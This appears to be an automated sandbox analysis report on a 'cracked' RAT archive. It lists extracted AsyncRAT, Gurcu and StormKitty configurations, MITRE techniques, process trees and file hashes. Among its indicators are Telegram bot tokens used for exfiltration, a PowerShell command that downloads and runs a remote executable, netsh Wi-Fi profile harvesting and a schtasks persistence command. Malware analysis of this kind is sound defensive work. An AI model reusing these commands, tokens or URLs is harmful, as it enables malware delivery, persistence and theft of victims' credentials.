Analysis
-
max time kernel
214s -
max time network
219s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-01-2025 20:21
Behavioral task
behavioral1
Sample
S500 RAT Cracked + Source .rar
Resource
win11-20241007-en
General
-
Target
S500 RAT Cracked + Source .rar
-
Size
147.7MB
-
MD5
5a39139ce5f13297aea9c5839d1447c6
-
SHA1
90c68a4f451c2fe75c6325198693b6f52971d573
-
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
-
SHA512
7a98ebd2ffb9dec789ddf5adf9fe2dad5a9527cb2e2c038933722012a9ead3fac98280dbf32f0ef5aaa4b6c57afe7768cdd2018e632fbe415c56925833e536b1
-
SSDEEP
3145728:Lp+2zwG6H0uXZ2nlHp75eJmivGPIpVQNQSsnyDZ5lc:Ls2cG1FlHp7ImqO8VIGyba
Malware Config
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
Venom Pwn3rzs' Edtition v6.0.1
Default
oevtobrbpcmpahavl
-
delay
1
-
install
false
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/LwwcrLg4
Extracted
gurcu
https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226
https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendDocument?chat_id=123860022
https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=503857034
Signatures
-
Asyncrat family
-
Gurcu family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x001c00000002ab33-253.dat family_stormkitty behavioral1/memory/2488-255-0x0000000000D90000-0x0000000000DC2000-memory.dmp family_stormkitty -
Stormkitty family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x001c00000002ab33-253.dat family_asyncrat behavioral1/files/0x001900000002aadd-503.dat family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 49 3640 powershell.exe -
pid Process 3640 powershell.exe -
Executes dropped EXE 6 IoCs
pid Process 1632 S500RAT.exe 2152 ServerRegistrationManager.exe 2488 S500RAT Cracked.exe 3104 ServerRegistrationManager.exe 1416 KeyGenerator.exe 3040 SearchFilterHost.exe -
Loads dropped DLL 2 IoCs
pid Process 2152 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe -
Obfuscated with Agile.Net obfuscator 2 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x001c00000002aadb-239.dat agile_net behavioral1/memory/2152-240-0x0000024835620000-0x0000024835812000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini S500RAT Cracked.exe File created C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini S500RAT Cracked.exe File created C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini S500RAT Cracked.exe File created C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini S500RAT Cracked.exe File created C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini S500RAT Cracked.exe File opened for modification C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini S500RAT Cracked.exe File created C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini S500RAT Cracked.exe File created C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini S500RAT Cracked.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 icanhazip.com 6 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
resource yara_rule behavioral1/files/0x001900000002ab34-230.dat upx behavioral1/memory/1632-231-0x0000000000400000-0x0000000000439000-memory.dmp upx behavioral1/memory/1632-266-0x0000000000400000-0x0000000000439000-memory.dmp upx behavioral1/memory/1632-537-0x0000000000400000-0x0000000000439000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S500RAT Cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S500RAT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3296 cmd.exe 3744 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 S500RAT Cracked.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier S500RAT Cracked.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\TypedURLs ServerRegistrationManager.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\TypedURLs ServerRegistrationManager.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 428 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 2488 S500RAT Cracked.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeRestorePrivilege 968 7zFM.exe Token: 35 968 7zFM.exe Token: SeSecurityPrivilege 968 7zFM.exe Token: SeDebugPrivilege 2488 S500RAT Cracked.exe Token: SeDebugPrivilege 1416 KeyGenerator.exe Token: SeIncreaseQuotaPrivilege 1416 KeyGenerator.exe Token: SeSecurityPrivilege 1416 KeyGenerator.exe Token: SeTakeOwnershipPrivilege 1416 KeyGenerator.exe Token: SeLoadDriverPrivilege 1416 KeyGenerator.exe Token: SeSystemProfilePrivilege 1416 KeyGenerator.exe Token: SeSystemtimePrivilege 1416 KeyGenerator.exe Token: SeProfSingleProcessPrivilege 1416 KeyGenerator.exe Token: SeIncBasePriorityPrivilege 1416 KeyGenerator.exe Token: SeCreatePagefilePrivilege 1416 KeyGenerator.exe Token: SeBackupPrivilege 1416 KeyGenerator.exe Token: SeRestorePrivilege 1416 KeyGenerator.exe Token: SeShutdownPrivilege 1416 KeyGenerator.exe Token: SeDebugPrivilege 1416 KeyGenerator.exe Token: SeSystemEnvironmentPrivilege 1416 KeyGenerator.exe Token: SeRemoteShutdownPrivilege 1416 KeyGenerator.exe Token: SeUndockPrivilege 1416 KeyGenerator.exe Token: SeManageVolumePrivilege 1416 KeyGenerator.exe Token: 33 1416 KeyGenerator.exe Token: 34 1416 KeyGenerator.exe Token: 35 1416 KeyGenerator.exe Token: 36 1416 KeyGenerator.exe Token: SeIncreaseQuotaPrivilege 1416 KeyGenerator.exe Token: SeSecurityPrivilege 1416 KeyGenerator.exe Token: SeTakeOwnershipPrivilege 1416 KeyGenerator.exe Token: SeLoadDriverPrivilege 1416 KeyGenerator.exe Token: SeSystemProfilePrivilege 1416 KeyGenerator.exe Token: SeSystemtimePrivilege 1416 KeyGenerator.exe Token: SeProfSingleProcessPrivilege 1416 KeyGenerator.exe Token: SeIncBasePriorityPrivilege 1416 KeyGenerator.exe Token: SeCreatePagefilePrivilege 1416 KeyGenerator.exe Token: SeBackupPrivilege 1416 KeyGenerator.exe Token: SeRestorePrivilege 1416 KeyGenerator.exe Token: SeShutdownPrivilege 1416 KeyGenerator.exe Token: SeDebugPrivilege 1416 KeyGenerator.exe Token: SeSystemEnvironmentPrivilege 1416 KeyGenerator.exe Token: SeRemoteShutdownPrivilege 1416 KeyGenerator.exe Token: SeUndockPrivilege 1416 KeyGenerator.exe Token: SeManageVolumePrivilege 1416 KeyGenerator.exe Token: 33 1416 KeyGenerator.exe Token: 34 1416 KeyGenerator.exe Token: 35 1416 KeyGenerator.exe Token: 36 1416 KeyGenerator.exe Token: SeDebugPrivilege 3040 SearchFilterHost.exe Token: SeDebugPrivilege 3640 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 968 7zFM.exe 968 7zFM.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1632 S500RAT.exe 2152 ServerRegistrationManager.exe 2152 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe 3104 ServerRegistrationManager.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1632 wrote to memory of 2552 1632 S500RAT.exe 82 PID 1632 wrote to memory of 2552 1632 S500RAT.exe 82 PID 2552 wrote to memory of 2212 2552 cmd.exe 84 PID 2552 wrote to memory of 2212 2552 cmd.exe 84 PID 2552 wrote to memory of 2152 2552 cmd.exe 85 PID 2552 wrote to memory of 2152 2552 cmd.exe 85 PID 2488 wrote to memory of 3296 2488 S500RAT Cracked.exe 99 PID 2488 wrote to memory of 3296 2488 S500RAT Cracked.exe 99 PID 2488 wrote to memory of 3296 2488 S500RAT Cracked.exe 99 PID 3296 wrote to memory of 3272 3296 cmd.exe 101 PID 3296 wrote to memory of 3272 3296 cmd.exe 101 PID 3296 wrote to memory of 3272 3296 cmd.exe 101 PID 3296 wrote to memory of 3744 3296 cmd.exe 102 PID 3296 wrote to memory of 3744 3296 cmd.exe 102 PID 3296 wrote to memory of 3744 3296 cmd.exe 102 PID 3296 wrote to memory of 1052 3296 cmd.exe 103 PID 3296 wrote to memory of 1052 3296 cmd.exe 103 PID 3296 wrote to memory of 1052 3296 cmd.exe 103 PID 2488 wrote to memory of 3480 2488 S500RAT Cracked.exe 104 PID 2488 wrote to memory of 3480 2488 S500RAT Cracked.exe 104 PID 2488 wrote to memory of 3480 2488 S500RAT Cracked.exe 104 PID 3480 wrote to memory of 4148 3480 cmd.exe 106 PID 3480 wrote to memory of 4148 3480 cmd.exe 106 PID 3480 wrote to memory of 4148 3480 cmd.exe 106 PID 3480 wrote to memory of 1084 3480 cmd.exe 107 PID 3480 wrote to memory of 1084 3480 cmd.exe 107 PID 3480 wrote to memory of 1084 3480 cmd.exe 107 PID 1416 wrote to memory of 428 1416 KeyGenerator.exe 115 PID 1416 wrote to memory of 428 1416 KeyGenerator.exe 115 PID 2552 wrote to memory of 3640 2552 cmd.exe 123 PID 2552 wrote to memory of 3640 2552 cmd.exe 123 PID 2552 wrote to memory of 1380 2552 cmd.exe 124 PID 2552 wrote to memory of 1380 2552 cmd.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:968
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1232
-
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\693.tmp\694.tmp\695.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:2212
-
-
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exeServerRegistrationManager.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3640
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe3⤵PID:1380
-
-
-
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
- System Location Discovery: System Language Discovery
PID:3272
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3744
-
-
C:\Windows\SysWOW64\findstr.exefindstr All3⤵
- System Location Discovery: System Language Discovery
PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
- System Location Discovery: System Language Discovery
PID:4148
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1084
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:1092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:2120
-
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3104
-
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN SearchFilterHost /TR "C:\ProgramData\SearchFilterHost\SearchFilterHost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:428
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2140
-
C:\ProgramData\SearchFilterHost\SearchFilterHost.exeC:\ProgramData\SearchFilterHost\SearchFilterHost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3040
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
301KB
MD5622aed98f14dc668ff4f7bbe9abd320f
SHA1c07b1c7b7cbf4b65d5b7d4717cbb6405087857a3
SHA25646d8c13876da79dc93cac213a93fbc04a6e3ebddbc23cc003acebd7941d5f1ae
SHA512f24148f0cab6c97b00a84e047d61690558b599aa3fa26895082f49ab485ec5b9e837899908ca631fc258c4f8d4c29765a5b4e05066965239935fb2e28f4dca92
-
C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Browsers\Firefox\Bookmarks.txt
Filesize105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\System\Process.txt
Filesize4KB
MD5b6c66a58b122624b3480839416a68746
SHA1e95eec37144baa0f9932e6b472502f67c9930f6d
SHA256ceb72824d42ca94ceea7ed62ccf0124441d4357ac89bb24a2c73abda85504522
SHA51243ed8f9bde7d9156c4bd312b7e84768391271cc0c407c3bfbc8bfafcee06c5e32824d591145aff6e7dad9c043be1ccecf45b9c4ea324ad51d9eb7192426a756a
-
Filesize
2KB
MD5687d3d582eeec1983bb49f15eeec7807
SHA1459b5f57cf96186cd6b6d5900eeaf1c5279f3580
SHA25672a9c452f1bac167742056d73ffb1a941cb61fd4eb1ab951ba39ed9e57440332
SHA5126560af0873d571895feb97948b286d06a04a42c9fbe45165ce4197c4899726774057e34fd1194a7095d753baa9d86c8d1d0e533c5499a88c2323d204bcfa2f5a
-
Filesize
1KB
MD5fc4af7384f0b6f274dd3e745f0aceeaa
SHA131b310f869b15b84e52ef282cabaee974e5043cf
SHA256f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
142KB
MD59c43f77cb7cff27cb47ed67babe3eda5
SHA1b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3587106988-279496464-3440778474-1000\d533a5560301935f53c58c2fa4238f08_605430f4-93cf-4c59-84cd-e6cd51bd2585
Filesize3KB
MD57d34759741a4a7b6807dc6800dc510b8
SHA1450a3acba9448cab4f88ee26366a9eb3507b4e79
SHA256a9322337dbaf20d9102ccc17cfe7a4f7d9ea49255abd4ce49debe971f989fd4d
SHA5129b6e8fc4d6c39ba687924c5221cff6bdb1020ca74144221bce28e3bf0eb3ee10ca344e213c03836e385a6b7af49ae7787443f003dd944dc4198aa754ed357ff6
-
Filesize
801B
MD5feb8d2de1663adc1e141b8f7bb95d6ac
SHA1a9b1c4d0f522515c940a80876876d782510cb421
SHA256ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b
SHA512af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3
-
Filesize
1KB
MD5e6fad395145548f21929c4050a70d710
SHA197a8780b8a3d25185f83f88c5f320384b4069601
SHA256c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92
SHA512857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799
-
Filesize
3KB
MD51efa2056cd994a29fd0d2e983ef7b26e
SHA176967624574c43b1e22e9b3ec4ba17139b547633
SHA2561e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d
SHA512edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2
-
Filesize
1KB
MD578f905ea7378410c450c79ceb3b9012b
SHA1495f677fd305c78a77e8164f7de7d732e1aca35c
SHA25650156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a
SHA512ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5
-
Filesize
505B
MD5f7bbcdd86cbc1d6d0b81720ac1477fde
SHA14799c37f86be4dda105ed3468934f70c36339474
SHA25650f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f
SHA5122a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2
-
Filesize
445B
MD5963be96779d4ef26360c2a3af3a53816
SHA16991959998c9939e5ededa0d6759a715559c2140
SHA256f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4
SHA5124525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0
-
Filesize
105B
MD5e9f329a48dcb70c6ad95c8ab8fe82eb0
SHA145e25355e67fd2d528467b4117884ffb601552a3
SHA2565dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637
SHA51262648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4
-
Filesize
3KB
MD5be38b0526e6d40f44c7b62d8db2c9553
SHA15c4c70ae1381b5e51a685f96700340832229c06d
SHA256f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f
SHA51277ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac
-
Filesize
1KB
MD5e03eaf459f028cc6fa8669e277c1a17a
SHA1ea0a775e49e279208962a9179c974969a2cf7e5e
SHA256a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f
SHA51217efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d
-
Filesize
2KB
MD5a54153cd522d951f6b360c3bd3de84d0
SHA1639dbc414f495044c2d705f39ac965212f1c8c30
SHA256195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa
SHA51295e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3
-
Filesize
4KB
MD5c60e527a85f285ddc66c2fcf160b1be7
SHA1abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA25635c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA51277a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e
-
Filesize
1.9MB
MD50f07705bd42d86d77dab085c42775244
SHA17e4b5c367183f4753a8d610e353c458c3def3888
